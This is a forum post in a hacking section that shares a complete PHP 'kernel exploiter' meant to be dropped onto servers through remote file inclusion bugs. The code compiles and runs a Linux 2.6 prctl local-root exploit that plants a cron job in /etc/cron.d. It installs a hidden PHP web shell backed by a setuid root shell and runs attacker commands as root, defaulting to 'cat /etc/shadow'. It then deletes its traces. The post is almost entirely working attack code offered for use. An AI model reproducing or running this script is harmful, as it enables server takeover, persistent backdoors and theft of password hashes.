Jump to content
alexcargo

PHP KERNEL EXPLOITER

By alexcargo, in Programe hacking

Recommended Posts

alexcargo Newbie

alexcargo

Posted
Posted 
<?php 
/* 

Kernel Exploiter for use in RFI bugs. 

*/ 
set_time_limit(0); 
if(isset($_POST['exploit_it'])) { 
   if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) { 
      if($_POST['compiler'] == "none") { 
echo '<div align="center"><h4>No compiler found! Can not continue.</h4></div>'; 
end; 
} 
$cc = $_POST['compiler']; 
$prctl = '#!/bin/sh 

cat > /tmp/getsuid.c << __EOF__ 
#include <stdio.h> 
#include <sys/time.h> 
#include <sys/resource.h> 
#include <unistd.h> 
#include <linux/prctl.h> 
#include <stdlib.h> 
#include <sys/types.h> 
#include <signal.h> 

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *   root   chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; 

int main() { 
    int child; 
    struct rlimit corelimit; 
    corelimit.rlim_cur = RLIM_INFINITY; 
    corelimit.rlim_max = RLIM_INFINITY; 
    setrlimit(RLIMIT_CORE, &corelimit); 
    if ( !( child = fork() )) { 
        chdir("/etc/cron.d"); 
        prctl(PR_SET_DUMPABLE, 2); 
        sleep(200); 
        exit(1); 
    } 
    kill(child, SIGSEGV); 
    sleep(120); 
} 
__EOF__ 

cat > /tmp/s.c << __EOF__ 
#include<stdio.h> 
main(void) 
{ 
setgid(0); 
setuid(0); 
if (getuid() == 0) { 
printf("\n[+] We have root!\n\n" ); 
system("/bin/sh"); 
system("$_POST[cmd]"); 
'; 
if(!stristr($_POST['shell'],"could not be found")) { 
$prctl .= 'system("cp /bin/ash '.$_POST['shell'].'");'; 
} 
$prctl .= 'system("rm -rf /tmp/s"); 
system("rm -rf /etc/cron.d/core*"); 
system("exit"); 
} else { 
printf("\n[-] Failed.\n\n" ); 
system("rm -rf '.$_ENV["TMPDIR"].'/s"); 
} 
return 0; 
} 
__EOF__ 
'; 

$phpwrapper = '<?php 
if(isset($_GET[cmd])) { 
echo "<pre>"; 
echo passthru("'.$_POST['shell'].' -c \"$_GET[cmd]\""); 
echo "</pre>"; 
} 
?>'; 
echo "<pre><div align='center'>"; 
      $h = fopen("/tmp/a.sh", "w"); 
      fwrite($h,$prctl); 
      fclose($h); 
      $handle = fopen($_POST['php'], "w"); 
      fwrite($handle, $phpwrapper); 
      fclose($handle); 
      echo "Building exploit....
"; 
      echo passthru("sh /tmp/a.sh"); 
      echo passthru("$cc -o /tmp/s /tmp/s.c"); 
      echo passthru("$cc -o /tmp/getsuid /tmp/getsuid.c"); 
      echo "Running exploit...waiting about 4 minutes to see if exploit worked
"; 
      echo passthru("/tmp/getsuid"); 
      echo passthru("/tmp/s"); 
      echo "Cleaning up
"; 
      echo passthru("rm -rf /tmp/getsuid*"); 
      echo passthru("rm -rf /tmp/s.c"); 
      echo passthru("rm -rf /tmp/a.sh"); 
      echo "Done!

</div> 
</pre>"; 

   } else { 
echo "Kernel version IS NOT 2.6.x or is a version known to not work: ".php_uname(); 
} 
} else { 

?> 
<div align="center"> 
<h4>PHP Attack Script</h4> 
<h5><?php echo php_uname(); ?></h5> 
<pre><div align="center"> 
Checking for temp Directory.........<?php echo $_ENV["TMPDIR"]."\n"; ?> 
Checking for cc or gcc............<?php 
$path = explode(":",$_ENV["PATH"]); 
$gotcc = FALSE; 
$gotgcc = FALSE; 
foreach($path as $dir) { 
   if(is_file($dir."/cc") && $gotgcc == FALSE && $gotcc == FALSE) { 
   $gotcc = TRUE; 
   $pathtocc = $dir."/cc"; 
   echo '[ <font color="#00CC00">OK</font> ]'."\n"; 
   break; 
   } elseif($gotcc == FALSE && $gotgcc == FALSE && is_file($dir."/gcc")) { 
   $gotgcc = TRUE; 
   $pathtogcc = $dir."/gcc"; 
   echo '[ <font color="#00CC00">OK</font> ]'."\n"; 
   break; 
   } 
} 
if($gotcc == FALSE && $gotgcc == FALSE) { 
echo '[ <font color="#FF0000">Failed</font> ]'."\n"; 
} 
?> 
Checking for execute permissions..<?php 
$h = fopen("/tmp/test.sh","w"); 
fwrite($h,"#!/bin/sh"); 
fclose($h); 
system("sh /tmp/test.sh",$returnval); 
if($returnval == 0) { 
echo '[ <font color="#00CC00">OK</font> ]'."\n"; 
} else { 
echo '[ <font color="#FF0000">Failed</font> ]'."\n"; 
} 
passthru("rm -rf /tmp/test.sh"); 
?> 
</pre></div>

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> 
  <table border="0" cellspacing="0"> 
  <tr> 
  <td><div align="right">Exploit:</div></td> 
   <td> 
   <select name="exploit"> 
   <option selected="selected">Prctl 2.6.x exploit</option> 
   </select> 
   </td> 
  </tr> 
    <tr> 
      <td><div align="right">Location and name for root shell:</div></td> 
      <td><input type="text" name="shell" size="50" value="<?php if(file_exists("/bin/ash")) { echo getcwd()."/.ash"; } elseif(file_exists("/bin/zsh")) { echo getcwd()."/.zsh"; } else { echo "/bin/ash or /bin/zsh could not be found!"; } ?>"/></td> 
    </tr> 
    <tr> 
      <td><div align="right">Location and name for php shell wrapper: </div></td> 
      <td><input type="text" name="php" size="50" value="<?php echo getcwd()."/.shell.php" ?>" /></td> 
    </tr> 
    <tr> 
      <td><div align="right">Commands to perform while root 
seperate multiple commands with ; : </div></td> 
      <td><input type="text" name="cmd" size="50" value="cat /etc/shadow" /></td> 
    </tr> 
  </table> 
</div> 
  <div align="center"> 
  <input type="hidden" name="compiler" value="<?php 
if(isset($pathtocc)) { 
echo $pathtocc; 
} elseif(isset($pathtogcc)) { 
echo $pathtogcc; 
} else { 
echo 'none'; 
} 
 ?>" /> 
  <input type="hidden" name="exploit_it" value="doit" /> 
  <input name="submit" type="submit" value="Submit" />

  After pressing submit it may take up to 4 minutes for the page to load depending 
  on exploit. 

  This is due to the exploit being run.

  If exploit fails the system may be patched or kernel may not be vuln. 
  </div> 
</form> 
<?php } ?>

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...